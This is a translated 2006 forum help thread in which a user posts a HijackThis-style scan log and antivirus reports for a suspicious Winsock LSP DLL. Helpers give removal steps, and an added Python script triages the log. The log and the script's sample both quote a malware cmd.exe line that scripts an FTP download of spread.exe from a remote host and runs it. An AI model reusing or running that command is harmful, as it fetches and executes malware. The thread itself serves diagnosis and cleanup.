[Help] Save me!

A while ago my computer was hit by a serious virus. At the time it disabled Rising, and the registry and a number of files were badly damaged. After running the antivirus the system still works, but many processes are using a file that came down together with the virus (see item 10 in the log), and svchost and the Rising monitor are using a lot of CPU. Would an expert please take a look and analyse it?
Logfile of Kaka v2.0.0.9 Scan Module v2.0.0.1
Scan saved at 16:54:18, on 2006-07-21
Platform: Microsoft Windows XP Professional Service Pack 1 (Build 2600)
MSIE: Internet Explorer v6.00 SP1; (6.00.2800.1106 (xpsp1.020828-1920))


Running processes:
[SMSS.EXE]
CommandLine =

[CSRSS.EXE]
CommandLine = C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

[WINLOGON.EXE]
CommandLine = winlogon.exe

[SERVICES.EXE]
CommandLine = C:\WINDOWS\system32\services.exe

[LSASS.EXE]
CommandLine = C:\WINDOWS\system32\lsass.exe

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\system32\svchost -k rpcss

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k netsvcs

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k NetworkService

[CCenter.exe]
CommandLine = "C:\PROGRAM FILES\RISING\RAV\CCENTER.EXE"

[RavMonD.exe]
CommandLine = "C:\Program Files\Rising\Rav\Ravmond.exe"

[SPOOLSV.EXE]
CommandLine = C:\WINDOWS\system32\spoolsv.exe

[RavStub.exe]
CommandLine = "C:\Program Files\Rising\Rav\RavStub.exe" /RAVMOND

[EXPLORER.EXE]
CommandLine = C:\WINDOWS\Explorer.EXE

[RavTask.exe]
CommandLine = "C:\PROGRAM FILES\RISING\RAV\RAVTASK.EXE" -SYSTEM

[RavMon.exe]
CommandLine = "C:\Program Files\Rising\Rav\Ravmon.exe" -SYSTEM

[CTFMON.EXE]
CommandLine = "C:\WINDOWS\System32\ctfmon.exe"

[taskmgr.exe]
CommandLine = taskmgr.exe

[alg.exe]
CommandLine = C:\WINDOWS\System32\alg.exe

[nvsvc32.exe]
CommandLine = C:\WINDOWS\System32\nvsvc32.exe

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k imgsvc

[wdfmgr.exe]
CommandLine = C:\WINDOWS\System32\wdfmgr.exe

[QQ.EXE]
CommandLine = "D:\Program Files\Tencent\QQ\QQ.exe"

[TIMPlatform.exe]
CommandLine = "D:\Program Files\Tencent\QQ\TIMPlatform.exe" -Embedding

[KkScan.exe]
CommandLine = "c:\Program Files\Rising\KakaToolBar\KkScan.exe"

[avant.exe]
CommandLine = "F:\Program Files\Avant Browser\avant.exe"

[SVCHOST.EXE]
CommandLine = C:\WINDOWS\system32\svchost.exe -k LocalService

[cmd.exe]
CommandLine = cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe



R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=http://www.hao123.com/
R3 - Default URLSearchHook is missing
O1 - Hosts: 127.0.0.1      localhost
O2 - BHO:  (file missing)
O2 - BHO:  (file missing)
O2 - BHO: bho Class - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} -  (file missing)
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - D:\PROGRA~1\FLASHGET\fgiebar.dll
O3 - Toolbar:  (file missing)
O3 - Toolbar: 电台(&R) - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINDOWS\System32\KakaTool.dll
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKLM\..\Run: [RavTimer] C:\PROGRA~1\RISING\RAV\RAVTIMER.EXE
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - Startup: desktop.ini =
O4 - Startup: 腾讯QQ.lnk = D:\Program Files\Tencent\QQ\QQ.exe
O4 - Global Startup: desktop.ini =
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: 上传到QQ网络硬盘 - D:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 使用网际快车下载 - D:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用网际快车下载全部链接 - D:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: 加入POCO网摘(&K) - http://my.poco.cn/fav/rightClick.php
O8 - Extra context menu item: 我的POCO网摘(&O) - http://my.poco.cn/fav/open_myfav.php
O8 - Extra context menu item: 添加到QQ自定义面板 - D:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - D:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - D:\Program Files\Tencent\QQ\SendMMS.htm
O9 - Extra Button: @shdoclc.dll,-866 - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra 'Tools' menuitem: @shdoclc.dll,-864 - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra Button: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - D:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra 'Tools' menuitem: 腾讯QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - D:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\MSMSGS.EXE
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
O16 - DPF: DirectAnimation Java Classes - file://C:\WINDOWS\Java\classes\dajava.cab
O16 - DPF: {05C1004E-2596-48E5-8E26-39362985EEB9} (MMCPlayer Class) - http://p3p.sogou.com/MMCShell.cab
O16 - DPF: {12345678-1234-1234-1234-123456789011} - http://www.ads173.com/shipin/ray.exe
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {D0A29C6C-AA71-4423-8C4A-5998B774C448} (IEDown Class) - http://download.ourgame.com/IEDown4.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BFDE4DC3-1980-4FE9-9B02-34A94D5903F3}: NameServer = 202.99.160.68 202.99.168.8
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: cdl - {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\System32\msvidctl.dll
O18 - Protocol: file - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\System32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: local - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\WINDOWS\System32\inetcomm.dll
O18 - Protocol: mk - {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\System32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll"
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\System32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\System32\mshtml.dll
O18 - Protocol: vnd.ms.radio - {3DA2AA3B-3D96-11D2-9BD2-204C4F4F5020} - C:\WINDOWS\System32\msdxm.ocx
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\System32\wiascr.dll
O23 - Service: Human Interface Device Access (HidServ) -  - C:\WINDOWS\System32\svchost.exe -k netsvcs
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - C:\PROGRAM FILES\RISING\RAV\CCENTER.EXE
O23 - Service: RsRavMon Service (RsRavMon) - Beijing Rising Technology Co., Ltd. - "C:\Program Files\Rising\Rav\Ravmond.exe"
Please help.
Last edited 2006-07-22 01:33:15
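The log above uses the Kaka/HijackThis layout: a "Running processes" block of `[image]` / `CommandLine =` pairs, then numbered sections (R0, O2, O10, O16 and so on). As an added example, which is not code from this thread, from Rising or from HijackThis, here is a small Python triage script that parses that layout and flags the kinds of entry the replies in this thread act on: the same unknown DLL repeated through the O10 Winsock LSP chain, a cmd.exe line that builds an FTP script with `echo` and runs it through `ftp -s:`, an O16 ActiveX download that points at a bare `.exe`, BHOs whose file is missing, and IE policy restrictions. The sample log is a constructed excerpt of a few lines from this thread's log; the regexes and finding names are assumptions chosen for the example.

```python
"""Triage a Kaka/HijackThis-style scan log for the indicators seen in this thread."""
import re
from collections import Counter

# Constructed sample: a few lines modelled on the log posted in this thread (raw string, so
# backslashes in Windows paths are kept literally).
SAMPLE_LOG = r"""
[SVCHOST.EXE]
CommandLine = C:\WINDOWS\System32\svchost.exe -k netsvcs

[cmd.exe]
CommandLine = cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe

O2 - BHO: bho Class - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} -  (file missing)
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O10 - Unknown file in Winsock LSP: C:\WINDOWS\System32\cn_spi.dll
O16 - DPF: {12345678-1234-1234-1234-123456789011} - http://www.ads173.com/shipin/ray.exe
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
"""

PROCESS_RE = re.compile(r"^\[(.+)\]$")                 # "[cmd.exe]" header of a process block
ENTRY_RE = re.compile(r"^(R\d|F\d|O\d+)\s+-\s+(.*)$")  # "O10 - ..." section lines
# "echo open <host> ... ftp(.exe) ... -s:<script>": an FTP script assembled with echo and fed to ftp.exe
FTP_SCRIPT_RE = re.compile(r"\becho\s+open\s+\S+.*\bftp(?:\.exe)?\s+.*-s:", re.I)
# O16 entry whose download target is a bare executable rather than a .cab
DPF_EXE_RE = re.compile(r"-\s+(\S+\.exe)\s*$", re.I)


def parse_log(text):
    """Split a log into (processes, entries).

    processes: list of (image name, command line); entries: list of (section, body)."""
    processes, entries, image = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PROCESS_RE.match(line)
        if m:
            image = m.group(1)
            continue
        if image is not None and line.startswith("CommandLine ="):
            processes.append((image, line.split("=", 1)[1].strip()))
            image = None
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group(1), m.group(2)))
    return processes, entries


def lsp_chain(entries):
    """Count how many times each unknown DLL appears in the O10 (Winsock LSP) lines."""
    return Counter(body.split(":", 1)[1].strip()
                   for sec, body in entries
                   if sec == "O10" and body.startswith("Unknown file in Winsock LSP:"))


def triage(text):
    """Return a list of (finding kind, detail) for the indicators this script knows about."""
    processes, entries = parse_log(text)
    findings = []
    for image, cmd in processes:
        if FTP_SCRIPT_RE.search(cmd):
            findings.append(("ftp_downloader",
                             f"{image}: builds an FTP script with echo and runs it with ftp -s:"))
    for dll, n in lsp_chain(entries).items():
        findings.append(("lsp_unknown_dll", f"{dll} inserted {n} time(s) into the Winsock LSP chain"))
    for sec, body in entries:
        if sec == "O16" and DPF_EXE_RE.search(body):
            findings.append(("dpf_exe", f"ActiveX download points at a bare executable: {body}"))
        elif sec == "O2" and "(file missing)" in body:
            findings.append(("bho_missing", f"BHO registered but its file is gone: {body}"))
        elif sec == "O6" and body.endswith(" present"):
            findings.append(("ie_policy", f"IE lockdown policy set: {body}"))
    return findings


def kinds(findings):
    """Summarise findings as a Counter of finding kinds."""
    return Counter(kind for kind, _ in findings)


if __name__ == "__main__":
    for kind, detail in triage(SAMPLE_LOG):
        print(f"[{kind}] {detail}")
```

Run against a full log, the `lsp_unknown_dll` count is the number of catalog entries the LSP fix-up tool will have to remove (seventeen for cn_spi.dll in this thread's log), and the `ftp_downloader` finding is the process to kill and the file (`spread.exe`, in the thread's log) to look for before rebooting.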

[Reply to the post by "直挂云帆济沧海"]
Let's take it step by step. Please don't panic, OP; first let's confirm what the problem is.



Please scan the following file with the two multi-engine scanners below:
C:\WINDOWS\System32\cn_spi.dll
Multi-engine scan: VirusTotal

http://www.virustotal.com/
Multi-engine scan: Jotti

http://virusscan.jotti.org/


Be sure to paste the complete report.
For instructions see:
[Recommended] How to use the multi-engine scanners

http://forum.ikaka.com/topic.asp?board=67&artid=7957175
If you still have problems, reply in this thread.
 

STATUS: QUEUED. Your file "cn_spi.dll" is queued in position: 6. Estimated start time is between 51 and 77 seconds.
VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware.
STATUS: FINISHED. Complete scanning result of "cn_spi.dll", received in VirusTotal at 07.21.2006, 16:38:21 (CET).

Antivirus Version Update Result
AntiVir 6.35.0.21 07.21.2006 HEUR/Malware.Crypted.PSM
Authentium 4.93.8 07.20.2006  no virus found
Avast 4.7.844.0 07.19.2006  no virus found
AVG 386 07.21.2006  no virus found
BitDefender 7.2 07.21.2006  no virus found
CAT-QuickHeal 8.00 07.20.2006  no virus found
ClamAV devel-20060426 07.20.2006  no virus found
DrWeb 4.33 07.21.2006  no virus found
eTrust-InoculateIT 23.72.74 07.20.2006  no virus found
eTrust-Vet 12.6.2305 07.21.2006  no virus found
Ewido 4.0 07.21.2006  no virus found
Fortinet 2.77.0.0 07.21.2006 suspicious
F-Prot 3.16f 07.20.2006  no virus found
F-Prot4 4.2.1.29 07.20.2006  no virus found
Ikarus 0.2.65.0 07.21.2006 Backdoor.Win32.Hupigon.BV
Kaspersky 4.0.2.24 07.21.2006  no virus found
McAfee 4811 07.20.2006  no virus found
Microsoft 1.1508 07.21.2006  no virus found
NOD32v2 1.1672 07.21.2006  no virus found
Norman 5.90.23 07.21.2006  no virus found
Panda 9.0.0.4 07.21.2006 Suspicious file
Sophos 4.07.0 07.21.2006  no virus found
Symantec 8.0 07.21.2006  no virus found
TheHacker 5.9.8.179 07.21.2006  no virus found
UNA 1.83 07.20.2006  no virus found
VBA32 3.11.0 - suspected of Downloader.Small.74 (paranoid heuristics)
VirusBuster 4.3.7:9 07.21.2006 no virus found


Aditional Information
File size: 9679 bytes
MD5: a0a21130de072a42cf8a6517d52d21cb
SHA1: aaadb9361a4a1410c5d638fbc1226bdb77e0fe23
packers: NSPack, PE_Patch

I can't understand any of this; thank you for your trouble, experts.
Jotti's malware scan 2.99-TRANSITION_TO_3.00-R1

File:  cn_spi.dll 
Status:  POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database) 
MD5  a0a21130de072a42cf8a6517d52d21cb 
Packers detected:  NSPACK
Scanner results 
AntiVir  Found Heuristic/Malware.Crypted.PSM (probable variant) 
ArcaVir  Found nothing
Avast  Found nothing
AVG Antivirus  Found nothing
BitDefender  Found nothing
ClamAV  Found nothing
Dr.Web  Found nothing
F-Prot Antivirus  Found nothing
Fortinet  Found nothing
Kaspersky Anti-Virus  Found nothing
NOD32  Found nothing
Norman Virus Control  Found nothing
UNA  Found nothing
VirusBuster  Found nothing
VBA32  Found Downloader.Small.74 (paranoid heuristics) (probable variant) 
 
This is from the other scanner. In a word: I don't understand it.
C:\WINDOWS\System32\cn_spi.dll
This thing might as well be wiped out.
Go to http://forum.ikaka.com/topic.asp?board=67&artid=5188931 and download these two programs: LSPFix.exe and WinsockXPFix.
Restart the computer. Once the power-on self-test finishes, press [F8] (you can keep pressing it until the boot menu appears) and choose Safe Mode to enter Windows.

Run LSPFix.exe
Delete
cn_spi.dll
Attached instructions:
LSPFix.exe is mainly used to help repair the O10 items found by a HijackThis scan.
To use it, close all IE windows and folder windows, then run LSPFix. Once it is running, move the O10 item you want to repair from the left pane to the right pane and click "Finish". (Before that, you need to tick "I know what I'm doing".)
Double-click My Computer, then Tools, Folder Options, View; select "Show hidden files and folders", clear the "Hide protected operating system files (Recommended)" checkbox, click "Yes" when prompted to confirm the change, and clear "Hide extensions for known file types".
Delete
C:\WINDOWS\System32\cn_spi.dll

Restart after the repair. If you cannot get online, run WinsockXPFix and let it repair the connection.
Back in normal mode, scan again and paste the new log.